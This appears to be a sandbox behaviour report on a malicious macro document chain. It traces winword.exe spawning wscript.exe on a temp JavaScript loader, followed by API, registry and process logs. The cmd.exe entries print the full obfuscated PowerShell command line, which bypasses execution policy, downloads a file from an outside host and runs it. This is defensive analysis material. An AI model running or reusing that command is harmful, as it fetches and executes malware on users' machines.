System	Get Time	type = Performance Ctr, time = 17153810044	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff410000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 112, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:51 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 119621	1	Fn
System	Get Time	type = Performance Ctr, time = 17240041764	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 119637	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = ô0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:52 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 119808	1	Fn
System	Get Time	type = Performance Ctr, time = 17261318956	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:52 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 119839	1	Fn
System	Get Time	type = Performance Ctr, time = 17263553347	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 119964	1	Fn
System	Get Time	type = Ticks, time = 119980	5	Fn
System	Get Time	type = Ticks, time = 119995	9	Fn
System	Get Time	type = Ticks, time = 120042	3	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 120042	6	Fn
System	Get Time	type = Ticks, time = 120058	5	Fn
System	Get Time	type = Ticks, time = 120073	4	Fn
System	Get Time	type = Ticks, time = 120089	2	Fn
System	Get Time	type = Ticks, time = 120105	4	Fn
System	Get Time	type = Ticks, time = 120120	1	Fn
System	Get Time	type = Ticks, time = 120136	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:52 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 120401	1	Fn
System	Get Time	type = Performance Ctr, time = 17357663375	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff410000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff41d7f8	1	Fn
System	Get Time	type = Ticks, time = 120417	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 120432	2	Fn
Process	Create	process_name = cmd.exe, show_window = 3191024	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xbb4

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 3562080		1	Fn

Process #4: cmd.exe

62

0

»

Information	Value
ID	#4
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:35

OS Process Information

»

Information	Value
PID	0x83c
Parent PID	0xba4 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 844

Threads

Thread 0x844

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:54 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 122039	1	Fn
System	Get Time	type = Performance Ctr, time = 17544329216	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x31c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #5: cmd.exe

62

0

»

Information	Value
ID	#5
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:35

OS Process Information

»

Information	Value
PID	0x848
Parent PID	0xb58 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 46C

Threads

Thread 0x46c

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:54 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 121992	1	Fn
System	Get Time	type = Performance Ctr, time = 17540425613	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x8b8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #6: wscript.exe

184

0

»

Information	Value
ID	#6
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:00:56, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0x41c
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8C0 0x 8F4 0x 8D4 0x 8E0 0x 154 0x 8F8 0x 908 0x 7D8 0x 81C 0x 820

Threads

Thread 0x8c0

183

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:54 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 122616	1	Fn
System	Get Time	type = Performance Ctr, time = 17610102718	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff8d0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 16, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
